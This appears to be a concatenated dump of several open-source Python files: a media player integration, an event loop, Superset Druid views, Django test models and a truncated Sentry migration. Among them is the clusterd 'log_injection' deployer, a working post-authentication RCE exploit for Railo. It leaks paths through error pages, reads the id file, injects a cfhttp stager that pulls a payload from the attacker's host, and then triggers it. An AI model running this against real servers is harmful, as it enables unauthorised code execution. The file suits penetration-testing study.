media_type = self.device.media_type
if media_type == 'Episode':
return MEDIA_TYPE_TVSHOW
elif media_type == 'Movie':
return MEDIA_TYPE_VIDEO
elif media_type == 'Trailer':
return MEDIA_TYPE_TRAILER
elif media_type == 'Music':
return MEDIA_TYPE_MUSIC
elif media_type == 'Video':
return MEDIA_TYPE_GENERIC_VIDEO
elif media_type == 'Audio':
return MEDIA_TYPE_MUSIC
return None
@property
def media_duration(self):
"""Return the duration of current playing media in seconds."""
return self.device.media_runtime
@property
def media_position(self):
"""Return the position of current playing media in seconds."""
return self.media_status_last_position
@property
def media_position_updated_at(self):
"""
When was the position of the current playing media valid.
Returns value from homeassistant.util.dt.utcnow().
"""
return self.media_status_received
@property
def media_image_url(self):
"""Return the image URL of current playing media."""
return self.device.media_image_url
@property
def media_title(self):
"""Return the title of current playing media."""
return self.device.media_title
@property
def media_season(self):
"""Season of curent playing media (TV Show only)."""
return self.device.media_season
@property
def media_series_title(self):
"""Return the title of the series of current playing media (TV)."""
return self.device.media_series_title
@property
def media_episode(self):
"""Return the episode of current playing media (TV only)."""
return self.device.media_episode
@property
def media_album_name(self):
"""Return the album name of current playing media (Music only)."""
return self.device.media_album_name
@property
def media_artist(self):
"""Return the artist of current playing media (Music track only)."""
return self.device.media_artist
@property
def media_album_artist(self):
"""Return the album artist of current playing media (Music only)."""
return self.device.media_album_artist
@property
def supported_features(self):
"""Flag media player features that are supported."""
if self.supports_remote_control:
return SUPPORT_EMBY
return None
def async_media_play(self):
"""Play media.
This method must be run in the event loop and returns a coroutine.
"""
return self.device.media_play()
def async_media_pause(self):
"""Pause the media player.
This method must be run in the event loop and returns a coroutine.
"""
return self.device.media_pause()
def async_media_stop(self):
"""Stop the media player.
This method must be run in the event loop and returns a coroutine.
"""
return self.device.media_stop()
def async_media_next_track(self):
"""Send next track command.
This method must be run in the event loop and returns a coroutine.
"""
return self.device.media_next()
def async_media_previous_track(self):
"""Send next track command.
This method must be run in the event loop and returns a coroutine.
"""
return self.device.media_previous()
def async_media_seek(self, position):
"""Send seek command.
This method must be run in the event loop and returns a coroutine.
"""
return self.device.media_seek(position)
|
apache-2.0
|
vicky2135/lucious
|
oscar/lib/python2.7/site-packages/prompt_toolkit/eventloop/asyncio_win32.py
|
23
|
2427
|
"""
Win32 asyncio event loop.
Windows notes:
- Somehow it doesn't seem to work with the 'ProactorEventLoop'.
"""
from __future__ import unicode_literals
from .base import EventLoop, INPUT_TIMEOUT
from ..terminal.win32_input import ConsoleInputReader
from .callbacks import EventLoopCallbacks
from .asyncio_base import AsyncioTimeout
import asyncio
__all__ = (
'Win32AsyncioEventLoop',
)
class Win32AsyncioEventLoop(EventLoop):
def __init__(self, loop=None):
self._console_input_reader = ConsoleInputReader()
self.running = False
self.closed = False
self.loop = loop or asyncio.get_event_loop()
@asyncio.coroutine
def run_as_coroutine(self, stdin, callbacks):
"""
The input 'event loop'.
"""
# Note: We cannot use "yield from", because this package also
# installs on Python 2.
assert isinstance(callbacks, EventLoopCallbacks)
if self.closed:
raise Exception('Event loop already closed.')
timeout = AsyncioTimeout(INPUT_TIMEOUT, callbacks.input_timeout, self.loop)
self.running = True
try:
while self.running:
timeout.reset()
# Get keys
try:
g = iter(self.loop.run_in_executor(None, self._console_input_reader.read))
while True:
yield next(g)
except StopIteration as e:
keys = e.args[0]
# Feed keys to input processor.
for k in keys:
callbacks.feed_key(k)
finally:
timeout.stop()
def stop(self):
self.running = False
def close(self):
# Note: we should not close the asyncio loop itself, because that one
# was not created here.
self.closed = True
self._console_input_reader.close()
def run_in_executor(self, callback):
self.loop.run_in_executor(None, callback)
def call_from_executor(self, callback, _max_postpone_until=None):
self.loop.call_soon_threadsafe(callback)
def add_reader(self, fd, callback):
" Start watching the file descriptor for read availability. "
self.loop.add_reader(fd, callback)
def remove_reader(self, fd):
" Stop watching the file descriptor for read availability. "
self.loop.remove_reader(fd)
|
bsd-3-clause
|
0x27/clusterd
|
src/platform/railo/deployers/log_injection.py
|
5
|
4821
|
from src.platform.railo.authenticate import checkAuth
from src.platform.railo.interfaces import RINTERFACES
from src.module.deploy_utils import _serve, waitServe, killServe, parse_war_path
from re import findall
from log import LOG
from hashlib import md5
from time import sleep
from os.path import abspath
from threading import Thread
from urllib import quote
from os import system
import state
import utility
title = RINTERFACES.WEB
versions = ['3.3', '4.0', '4.1', '4.2']
def deploy(fingerengine, fingerprint):
""" Exploit a post-auth RCE vulnerability in Railo; uses a simple cfhttp
stager to drop the payload
"""
payload = parse_war_path(fingerengine.options.deploy, True)
payload_path = abspath(fingerengine.options.deploy)
stager = ":<cfhttp method=\"get\" url=\"http://{0}:{1}/{2}\""\
" path=\"{3}\" file=\"{2}\">"
base = 'http://{0}:{1}'.format(fingerengine.options.ip,
fingerprint.port)
cookie = checkAuth(fingerengine.options.ip, fingerprint.port,
fingerprint.title)
if not cookie:
utility.Msg("Could not get auth for %s:%s" % (fingerengine.options.ip,
fingerprint.port),
LOG.ERROR)
return
utility.Msg("Fetching path...")
path = fetchPath(fingerengine, fingerprint)
utility.Msg("Found path %s" % path, LOG.DEBUG)
# configure stager
stager = quote(stager.format(utility.local_address(), state.external_port,
payload, path + "\context" if fingerengine.options.remote_os \
is 'windows' else '/context'))
utility.Msg("Pulling id file...")
fid = fetchId(base, path, cookie)
if not fid:
return
utility.Msg("Found id %s" % fid, LOG.DEBUG)
# we've got both the security token and the security key, calculate filename
session_file = md5(fid + md5(path).hexdigest()).hexdigest()
utility.Msg("Session file is web-%s.cfm, attempting to inject stager..." % session_file)
# trigger a new favorite with our web shell
uri = '/railo-context/admin/web.cfm?action=internal.savedata'
uri += '&action2=addfavorite&favorite=%s' % stager
response = utility.requests_get(base + uri, cookies=cookie)
if not response.status_code is 200:
utility.Msg("Failed to deploy stager (HTTP %d)" % response.status_code,
LOG.ERROR)
return
utility.Msg("Stager deployed, invoking...", LOG.SUCCESS)
system("cp {0} {1}/{2}".format(payload_path, state.serve_dir, payload))
server_thread = Thread(target=_serve, args=("%s/%s" % (state.serve_dir, payload),))
server_thread.start()
sleep(2)
# invoke
data_uri = "/railo-context/admin/userdata/web-%s.cfm" % session_file
_ = utility.requests_get(base + data_uri)
if waitServe(server_thread):
utility.Msg("{0} deployed at /railo-context/{0}".format(payload), LOG.SUCCESS)
killServe()
def fetchPath(fingerengine, fingerprint):
""" We need the path up to WEB-INF\\railo
"""
# attempt to trigger an error and pull the webroot
base = 'http://{0}:{1}'.format(fingerengine.options.ip, fingerprint.port)
uri = '/railo-context/admin/asdf.cfm'
response = utility.requests_get(base + uri)
if len(response.content) > 10:
data = findall("Page /admin/asdf.cfm \[(.*?)\]", response.content)
if len(data) > 0:
return data[0].rsplit("\\", 3)[0]
def fetchId(base, path, cookie):
""" Pretty simple two-step process to fetch the id:
a) Set the error handler template to the id file
b) Trigger an error
c) restore handler
"""
# set error handler
set_template = '/railo-context/admin/web.cfm?action=server.error'
data = { 'errType500' : 'Select',
'errorTemplate_Select500' : '/railo-context/templates/error/error.cfm', # default
'errType404' : 'File',
'errorTemplate_File404' : '/railo-context/../id',
'doStatusCode' : 'yes',
'mainAction' : 'update'
}
response = utility.requests_post(base + set_template, data=data, cookies=cookie)
if response.status_code is not 200:
utility.Msg("Failed to set error handler (HTTP %d)" % response.status_code, LOG.ERROR)
return None
# trigger 404 and pull file
response = utility.requests_get(base + '/railo-context/admin/xx.cfm')
id = response.content
# got the ID, restore handler
data['errorTemplate_File404'] = '/railo-context/templates/error/error.cfm'
response = utility.requests_post(base + set_template, data=data, cookies=cookie)
return id
|
mit
|
FrederichCheng/incubator-superset
|
superset/connectors/druid/views.py
|
2
|
11262
|
from datetime import datetime
import logging
import sqlalchemy as sqla
from flask import Markup, flash, redirect
from flask_appbuilder import CompactCRUDMixin, expose
from flask_appbuilder.models.sqla.interface import SQLAInterface
from flask_babel import lazy_gettext as _
from flask_babel import gettext as __
from superset import db, utils, appbuilder, sm, security
from superset.connectors.connector_registry import ConnectorRegistry
from superset.utils import has_access
from superset.connectors.base.views import DatasourceModelView
from superset.views.base import (
BaseSupersetView,
SupersetModelView, validate_json, DeleteMixin, ListWidgetWithCheckboxes,
DatasourceFilter, get_datasource_exist_error_mgs)
from . import models
class DruidColumnInlineView(CompactCRUDMixin, SupersetModelView): # noqa
datamodel = SQLAInterface(models.DruidColumn)
list_title = _('List Druid Column')
show_title = _('Show Druid Column')
add_title = _('Add Druid Column')
edit_title = _('Edit Druid Column')
edit_columns = [
'column_name', 'description', 'dimension_spec_json', 'datasource',
'groupby', 'filterable', 'count_distinct', 'sum', 'min', 'max']
add_columns = edit_columns
list_columns = [
'column_name', 'verbose_name', 'type', 'groupby', 'filterable', 'count_distinct',
'sum', 'min', 'max']
can_delete = False
page_size = 500
label_columns = {
'column_name': _("Column"),
'type': _("Type"),
'datasource': _("Datasource"),
'groupby': _("Groupable"),
'filterable': _("Filterable"),
'count_distinct': _("Count Distinct"),
'sum': _("Sum"),
'min': _("Min"),
'max': _("Max"),
}
description_columns = {
'filterable': _(
"Whether this column is exposed in the `Filters` section "
"of the explore view."),
'dimension_spec_json': utils.markdown(
"this field can be used to specify "
"a `dimensionSpec` as documented [here]"
"(http://druid.io/docs/latest/querying/dimensionspecs.html). "
"Make sure to input valid JSON and that the "
"`outputName` matches the `column_name` defined "
"above.",
True),
}
def post_update(self, col):
col.generate_metrics()
utils.validate_json(col.dimension_spec_json)
def post_add(self, col):
self.post_update(col)
appbuilder.add_view_no_menu(DruidColumnInlineView)
class DruidMetricInlineView(CompactCRUDMixin, SupersetModelView): # noqa
datamodel = SQLAInterface(models.DruidMetric)
list_title = _('List Druid Metric')
show_title = _('Show Druid Metric')
add_title = _('Add Druid Metric')
edit_title = _('Edit Druid Metric')
list_columns = ['metric_name', 'verbose_name', 'metric_type']
edit_columns = [
'metric_name', 'description', 'verbose_name', 'metric_type', 'json',
'datasource', 'd3format', 'is_restricted']
add_columns = edit_columns
page_size = 500
validators_columns = {
'json': [validate_json],
}
description_columns = {
'metric_type': utils.markdown(
"use `postagg` as the metric type if you are defining a "
"[Druid Post Aggregation]"
"(http://druid.io/docs/latest/querying/post-aggregations.html)",
True),
'is_restricted': _("Whether the access to this metric is restricted "
"to certain roles. Only roles with the permission "
"'metric access on XXX (the name of this metric)' "
"are allowed to access this metric"),
}
label_columns = {
'metric_name': _("Metric"),
'description': _("Description"),
'verbose_name': _("Verbose Name"),
'metric_type': _("Type"),
'json': _("JSON"),
'datasource': _("Druid Datasource"),
}
def post_add(self, metric):
if metric.is_restricted:
security.merge_perm(sm, 'metric_access', metric.get_perm())
def post_update(self, metric):
if metric.is_restricted:
security.merge_perm(sm, 'metric_access', metric.get_perm())
appbuilder.add_view_no_menu(DruidMetricInlineView)
class DruidClusterModelView(SupersetModelView, DeleteMixin): # noqa
datamodel = SQLAInterface(models.DruidCluster)
list_title = _('List Druid Cluster')
show_title = _('Show Druid Cluster')
add_title = _('Add Druid Cluster')
edit_title = _('Edit Druid Cluster')
add_columns = [
'verbose_name', 'coordinator_host', 'coordinator_port',
'coordinator_endpoint', 'broker_host', 'broker_port',
'broker_endpoint', 'cache_timeout', 'cluster_name',
]
edit_columns = add_columns
list_columns = ['cluster_name', 'metadata_last_refreshed']
search_columns = ('cluster_name',)
label_columns = {
'cluster_name': _("Cluster"),
'coordinator_host': _("Coordinator Host"),
'coordinator_port': _("Coordinator Port"),
'coordinator_endpoint': _("Coordinator Endpoint"),
'broker_host': _("Broker Host"),
'broker_port': _("Broker Port"),
'broker_endpoint': _("Broker Endpoint"),
}
def pre_add(self, cluster):
security.merge_perm(sm, 'database_access', cluster.perm)
def pre_update(self, cluster):
self.pre_add(cluster)
def _delete(self, pk):
DeleteMixin._delete(self, pk)
appbuilder.add_view(
DruidClusterModelView,
name="Druid Clusters",
label=__("Druid Clusters"),
icon="fa-cubes",
category="Sources",
category_label=__("Sources"),
category_icon='fa-database',)
class DruidDatasourceModelView(DatasourceModelView, DeleteMixin): # noqa
datamodel = SQLAInterface(models.DruidDatasource)
list_title = _('List Druid Datasource')
show_title = _('Show Druid Datasource')
add_title = _('Add Druid Datasource')
edit_title = _('Edit Druid Datasource')
list_widget = ListWidgetWithCheckboxes
list_columns = [
'datasource_link', 'cluster', 'changed_by_', 'modified']
related_views = [DruidColumnInlineView, DruidMetricInlineView]
edit_columns = [
'datasource_name', 'cluster', 'slices', 'description', 'owner',
'is_hidden',
'filter_select_enabled', 'fetch_values_from',
'default_endpoint', 'offset', 'cache_timeout']
search_columns = (
'datasource_name', 'cluster', 'description', 'owner'
)
add_columns = edit_columns
show_columns = add_columns + ['perm']
page_size = 500
base_order = ('datasource_name', 'asc')
description_columns = {
'slices': _(
"The list of slices associated with this table. By "
"altering this datasource, you may change how these associated "
"slices behave. "
"Also note that slices need to point to a datasource, so "
"this form will fail at saving if removing slices from a "
"datasource. If you want to change the datasource for a slice, "
"overwrite the slice from the 'explore view'"),
'offset': _("Timezone offset (in hours) for this datasource"),
'description': Markup(
"Supports <a href='"
"https://daringfireball.net/projects/markdown/'>markdown</a>"),
'fetch_values_from': _(
"Time expression to use as a predicate when retrieving "
"distinct values to populate the filter component. "
"Only applies when `Enable Filter Select` is on. If "
"you enter `7 days ago`, the distinct list of values in "
"the filter will be populated based on the distinct value over "
"the past week"),
'filter_select_enabled': _(
"Whether to populate the filter's dropdown in the explore "
"view's filter section with a list of distinct values fetched "
"from the backend on the fly"),
'default_endpoint': _(
"Redirects to this endpoint when clicking on the datasource "
"from the datasource list"),
}
base_filters = [['id', DatasourceFilter, lambda: []]]
label_columns = {
'slices': _("Associated Slices"),
'datasource_link': _("Data Source"),
'cluster': _("Cluster"),
'description': _("Description"),
'owner': _("Owner"),
'is_hidden': _("Is Hidden"),
'filter_select_enabled': _("Enable Filter Select"),
'default_endpoint': _("Default Endpoint"),
'offset': _("Time Offset"),
'cache_timeout': _("Cache Timeout"),
}
def pre_add(self, datasource):
number_of_existing_datasources = db.session.query(
sqla.func.count('*')).filter(
models.DruidDatasource.datasource_name ==
datasource.datasource_name,
models.DruidDatasource.cluster_name == datasource.cluster.id
).scalar()
# table object is already added to the session
if number_of_existing_datasources > 1:
raise Exception(get_datasource_exist_error_mgs(
datasource.full_name))
def post_add(self, datasource):
datasource.generate_metrics()
security.merge_perm(sm, 'datasource_access', datasource.get_perm())
if datasource.schema:
security.merge_perm(sm, 'schema_access', datasource.schema_perm)
def post_update(self, datasource):
self.post_add(datasource)
def _delete(self, pk):
DeleteMixin._delete(self, pk)
appbuilder.add_view(
DruidDatasourceModelView,
"Druid Datasources",
label=__("Druid Datasources"),
category="Sources",
category_label=__("Sources"),
icon="fa-cube")
class Druid(BaseSupersetView):
"""The base views for Superset!"""
@has_access
@expose("/refresh_datasources/")
def refresh_datasources(self):
"""endpoint that refreshes druid datasources metadata"""
session = db.session()
DruidCluster = ConnectorRegistry.sources['druid'].cluster_class
for cluster in session.query(DruidCluster).all():
cluster_name = cluster.cluster_name
try:
cluster.refresh_datasources()
except Exception as e:
flash(
"Error while processing cluster '{}'\n{}".format(
cluster_name, utils.error_msg_from_exception(e)),
"danger")
logging.exception(e)
return redirect('/druidclustermodelview/list/')
cluster.metadata_last_refreshed = datetime.now()
flash(
"Refreshed metadata from cluster "
"[" + cluster.cluster_name + "]",
'info')
session.commit()
return redirect("/druiddatasourcemodelview/list/")
appbuilder.add_view_no_menu(Druid)
appbuilder.add_link(
"Refresh Druid Metadata",
label=__("Refresh Druid Metadata"),
href='/druid/refresh_datasources/',
category='Sources',
category_label=__("Sources"),
category_icon='fa-database',
icon="fa-cog")
appbuilder.add_separator("Sources", )
|
apache-2.0
|
raphaelmerx/django
|
tests/model_fields/models.py
|
210
|
12155
|
import os
import tempfile
import uuid
from django.contrib.contenttypes.fields import (
GenericForeignKey, GenericRelation,
)
from django.contrib.contenttypes.models import ContentType
from django.core.files.storage import FileSystemStorage
from django.db import models
from django.db.models.fields.files import ImageField, ImageFieldFile
from django.db.models.fields.related import (
ForeignKey, ForeignObject, ManyToManyField, OneToOneField,
)
from django.utils import six
try:
from PIL import Image
except ImportError:
Image = None
class Foo(models.Model):
a = models.CharField(max_length=10)
d = models.DecimalField(max_digits=5, decimal_places=3)
def get_foo():
return Foo.objects.get(id=1).pk
class Bar(models.Model):
b = models.CharField(max_length=10)
a = models.ForeignKey(Foo, models.CASCADE, default=get_foo, related_name=b'bars')
class Whiz(models.Model):
CHOICES = (
('Group 1', (
(1, 'First'),
(2, 'Second'),
)
),
('Group 2', (
(3, 'Third'),
(4, 'Fourth'),
)
),
(0, 'Other'),
)
c = models.IntegerField(choices=CHOICES, null=True)
class Counter(six.Iterator):
def __init__(self):
self.n = 1
def __iter__(self):
return self
def __next__(self):
if self.n > 5:
raise StopIteration
else:
self.n += 1
return (self.n, 'val-' + str(self.n))
class WhizIter(models.Model):
c = models.IntegerField(choices=Counter(), null=True)
class WhizIterEmpty(models.Model):
c = models.CharField(choices=(x for x in []), blank=True, max_length=1)
class BigD(models.Model):
d = models.DecimalField(max_digits=38, decimal_places=30)
class FloatModel(models.Model):
size = models.FloatField()
class BigS(models.Model):
s = models.SlugField(max_length=255)
class UnicodeSlugField(models.Model):
s = models.SlugField(max_length=255, allow_unicode=True)
class SmallIntegerModel(models.Model):
value = models.SmallIntegerField()
class IntegerModel(models.Model):
value = models.IntegerField()
class BigIntegerModel(models.Model):
value = models.BigIntegerField()
null_value = models.BigIntegerField(null=True, blank=True)
class PositiveSmallIntegerModel(models.Model):
value = models.PositiveSmallIntegerField()
class PositiveIntegerModel(models.Model):
value = models.PositiveIntegerField()
class Post(models.Model):
title = models.CharField(max_length=100)
body = models.TextField()
class NullBooleanModel(models.Model):
nbfield = models.NullBooleanField()
class BooleanModel(models.Model):
bfield = models.BooleanField(default=None)
string = models.CharField(max_length=10, default='abc')
class DateTimeModel(models.Model):
d = models.DateField()
dt = models.DateTimeField()
t = models.TimeField()
class DurationModel(models.Model):
field = models.DurationField()
class NullDurationModel(models.Model):
field = models.DurationField(null=True)
class PrimaryKeyCharModel(models.Model):
string = models.CharField(max_length=10, primary_key=True)
class FksToBooleans(models.Model):
"""Model with FKs to models with {Null,}BooleanField's, #15040"""
bf = models.ForeignKey(BooleanModel, models.CASCADE)
nbf = models.ForeignKey(NullBooleanModel, models.CASCADE)
class FkToChar(models.Model):
"""Model with FK to a model with a CharField primary key, #19299"""
out = models.ForeignKey(PrimaryKeyCharModel, models.CASCADE)
class RenamedField(models.Model):
modelname = models.IntegerField(name="fieldname", choices=((1, 'One'),))
class VerboseNameField(models.Model):
id = models.AutoField("verbose pk", primary_key=True)
field1 = models.BigIntegerField("verbose field1")
field2 = models.BooleanField("verbose field2", default=False)
field3 = models.CharField("verbose field3", max_length=10)
field4 = models.CommaSeparatedIntegerField("verbose field4", max_length=99)
field5 = models.DateField("verbose field5")
field6 = models.DateTimeField("verbose field6")
field7 = models.DecimalField("verbose field7", max_digits=6, decimal_places=1)
field8 = models.EmailField("verbose field8")
field9 = models.FileField("verbose field9", upload_to="unused")
field10 = models.FilePathField("verbose field10")
field11 = models.FloatField("verbose field11")
# Don't want to depend on Pillow in this test
# field_image = models.ImageField("verbose field")
field12 = models.IntegerField("verbose field12")
field13 = models.GenericIPAddressField("verbose field13", protocol="ipv4")
field14 = models.NullBooleanField("verbose field14")
field15 = models.PositiveIntegerField("verbose field15")
field16 = models.PositiveSmallIntegerField("verbose field16")
field17 = models.SlugField("verbose field17")
field18 = models.SmallIntegerField("verbose field18")
field19 = models.TextField("verbose field19")
field20 = models.TimeField("verbose field20")
field21 = models.URLField("verbose field21")
field22 = models.UUIDField("verbose field22")
field23 = models.DurationField("verbose field23")
class GenericIPAddress(models.Model):
ip = models.GenericIPAddressField(null=True, protocol='ipv4')
###############################################################################
# These models aren't used in any test, just here to ensure they validate
# successfully.
# See ticket #16570.
class DecimalLessThanOne(models.Model):
d = models.DecimalField(max_digits=3, decimal_places=3)
# See ticket #18389.
class FieldClassAttributeModel(models.Model):
field_class = models.CharField
###############################################################################
class DataModel(models.Model):
short_data = models.BinaryField(max_length=10, default=b'\x08')
data = models.BinaryField()
###############################################################################
# FileField
class Document(models.Model):
myfile = models.FileField(upload_to='unused')
###############################################################################
# ImageField
# If Pillow available, do these tests.
if Image:
class TestImageFieldFile(ImageFieldFile):
"""
Custom Field File class that records whether or not the underlying file
was opened.
"""
def __init__(self, *args, **kwargs):
self.was_opened = False
super(TestImageFieldFile, self).__init__(*args, **kwargs)
def open(self):
self.was_opened = True
super(TestImageFieldFile, self).open()
class TestImageField(ImageField):
attr_class = TestImageFieldFile
# Set up a temp directory for file storage.
temp_storage_dir = tempfile.mkdtemp()
temp_storage = FileSystemStorage(temp_storage_dir)
temp_upload_to_dir = os.path.join(temp_storage.location, 'tests')
class Person(models.Model):
"""
Model that defines an ImageField with no dimension fields.
"""
name = models.CharField(max_length=50)
mugshot = TestImageField(storage=temp_storage, upload_to='tests')
class AbsctractPersonWithHeight(models.Model):
"""
Abstract model that defines an ImageField with only one dimension field
to make sure the dimension update is correctly run on concrete subclass
instance post-initialization.
"""
mugshot = TestImageField(storage=temp_storage, upload_to='tests',
height_field='mugshot_height')
mugshot_height = models.PositiveSmallIntegerField()
class Meta:
abstract = True
class PersonWithHeight(AbsctractPersonWithHeight):
"""
Concrete model that subclass an abctract one with only on dimension
field.
"""
name = models.CharField(max_length=50)
class PersonWithHeightAndWidth(models.Model):
"""
Model that defines height and width fields after the ImageField.
"""
name = models.CharField(max_length=50)
mugshot = TestImageField(storage=temp_storage, upload_to='tests',
height_field='mugshot_height',
width_field='mugshot_width')
mugshot_height = models.PositiveSmallIntegerField()
mugshot_width = models.PositiveSmallIntegerField()
class PersonDimensionsFirst(models.Model):
"""
Model that defines height and width fields before the ImageField.
"""
name = models.CharField(max_length=50)
mugshot_height = models.PositiveSmallIntegerField()
mugshot_width = models.PositiveSmallIntegerField()
mugshot = TestImageField(storage=temp_storage, upload_to='tests',
height_field='mugshot_height',
width_field='mugshot_width')
class PersonTwoImages(models.Model):
"""
Model that:
* Defines two ImageFields
* Defines the height/width fields before the ImageFields
* Has a nullalble ImageField
"""
name = models.CharField(max_length=50)
mugshot_height = models.PositiveSmallIntegerField()
mugshot_width = models.PositiveSmallIntegerField()
mugshot = TestImageField(storage=temp_storage, upload_to='tests',
height_field='mugshot_height',
width_field='mugshot_width')
headshot_height = models.PositiveSmallIntegerField(
blank=True, null=True)
headshot_width = models.PositiveSmallIntegerField(
blank=True, null=True)
headshot = TestImageField(blank=True, null=True,
storage=temp_storage, upload_to='tests',
height_field='headshot_height',
width_field='headshot_width')
class AllFieldsModel(models.Model):
big_integer = models.BigIntegerField()
binary = models.BinaryField()
boolean = models.BooleanField(default=False)
char = models.CharField(max_length=10)
csv = models.CommaSeparatedIntegerField(max_length=10)
date = models.DateField()
datetime = models.DateTimeField()
decimal = models.DecimalField(decimal_places=2, max_digits=2)
duration = models.DurationField()
email = models.EmailField()
file_path = models.FilePathField()
floatf = models.FloatField()
integer = models.IntegerField()
generic_ip = models.GenericIPAddressField()
null_boolean = models.NullBooleanField()
positive_integer = models.PositiveIntegerField()
positive_small_integer = models.PositiveSmallIntegerField()
slug = models.SlugField()
small_integer = models.SmallIntegerField()
text = models.TextField()
time = models.TimeField()
url = models.URLField()
uuid = models.UUIDField()
fo = ForeignObject(
'self',
on_delete=models.CASCADE,
from_fields=['abstract_non_concrete_id'],
to_fields=['id'],
related_name='reverse'
)
fk = ForeignKey(
'self',
models.CASCADE,
related_name='reverse2'
)
m2m = ManyToManyField('self')
oto = OneToOneField('self', models.CASCADE)
object_id = models.PositiveIntegerField()
content_type = models.ForeignKey(ContentType, models.CASCADE)
gfk = GenericForeignKey()
gr = GenericRelation(DataModel)
###############################################################################
class UUIDModel(models.Model):
field = models.UUIDField()
class NullableUUIDModel(models.Model):
field = models.UUIDField(blank=True, null=True)
class PrimaryKeyUUIDModel(models.Model):
id = models.UUIDField(primary_key=True, default=uuid.uuid4)
class RelatedToUUIDModel(models.Model):
uuid_fk = models.ForeignKey('PrimaryKeyUUIDModel', models.CASCADE)
class UUIDChild(PrimaryKeyUUIDModel):
pass
class UUIDGrandchild(UUIDChild):
pass
|
bsd-3-clause
|
jean/sentry
|
src/sentry/south_migrations/0274_auto__add_index_commit_repository_id_date_added.py
|
4
|
87196
|
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding index on 'Commit', fields ['repository_id', 'date_added']
db.create_index('sentry_commit', ['repository_id', 'date_added'])
def backwards(self, orm):
# Removing index on 'Commit', fields ['repository_id', 'date_added']
db.delete_index('sentry_commit', ['repository_id', 'date_added'])
models = {
'sentry.activity': {
'Meta': {
'object_name': 'Activity'
},
'data': ('sentry.db.models.fields.gzippeddict.GzippedDictField', [], {
'null': 'True'
}),
'datetime':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'group': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Group']",
'null': 'True'
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'ident':
('django.db.models.fields.CharField', [], {
'max_length': '64',
'null': 'True'
}),
'project': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Project']"
}
),
'type': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'user': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.User']",
'null': 'True'
}
)
},
'sentry.apikey': {
'Meta': {
'object_name': 'ApiKey'
},
'allowed_origins':
('django.db.models.fields.TextField', [], {
'null': 'True',
'blank': 'True'
}),
'date_added':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'key':
('django.db.models.fields.CharField', [], {
'unique': 'True',
'max_length': '32'
}),
'label': (
'django.db.models.fields.CharField', [], {
'default': "'Default'",
'max_length': '64',
'blank': 'True'
}
),
'organization': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'related_name': "'key_set'",
'to': "orm['sentry.Organization']"
}
),
'scopes': ('django.db.models.fields.BigIntegerField', [], {
'default': 'None'
}),
'status': (
'sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'default': '0',
'db_index': 'True'
}
)
},
'sentry.apitoken': {
'Meta': {
'object_name': 'ApiToken'
},
'date_added':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'key': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.ApiKey']",
'null': 'True'
}
),
'scopes': ('django.db.models.fields.BigIntegerField', [], {
'default': 'None'
}),
'token':
('django.db.models.fields.CharField', [], {
'unique': 'True',
'max_length': '64'
}),
'user': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.User']"
}
)
},
'sentry.auditlogentry': {
'Meta': {
'object_name': 'AuditLogEntry'
},
'actor': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'blank': 'True',
'related_name': "'audit_actors'",
'null': 'True',
'to': "orm['sentry.User']"
}
),
'actor_key': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.ApiKey']",
'null': 'True',
'blank': 'True'
}
),
'actor_label': (
'django.db.models.fields.CharField', [], {
'max_length': '64',
'null': 'True',
'blank': 'True'
}
),
'data': ('sentry.db.models.fields.gzippeddict.GzippedDictField', [], {}),
'datetime':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'event': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'ip_address': (
'django.db.models.fields.GenericIPAddressField', [], {
'max_length': '39',
'null': 'True'
}
),
'organization': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Organization']"
}
),
'target_object':
('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'null': 'True'
}),
'target_user': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'blank': 'True',
'related_name': "'audit_targets'",
'null': 'True',
'to': "orm['sentry.User']"
}
)
},
'sentry.authenticator': {
'Meta': {
'unique_together': "(('user', 'type'),)",
'object_name': 'Authenticator',
'db_table': "'auth_authenticator'"
},
'config': ('sentry.db.models.fields.pickle.UnicodePickledObjectField', [], {}),
'created_at':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'id': ('sentry.db.models.fields.bounded.BoundedAutoField', [], {
'primary_key': 'True'
}),
'last_used_at': ('django.db.models.fields.DateTimeField', [], {
'null': 'True'
}),
'type': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'user': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.User']"
}
)
},
'sentry.authidentity': {
'Meta': {
'unique_together': "(('auth_provider', 'ident'), ('auth_provider', 'user'))",
'object_name': 'AuthIdentity'
},
'auth_provider': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.AuthProvider']"
}
),
'data': ('jsonfield.fields.JSONField', [], {
'default': '{}'
}),
'date_added':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
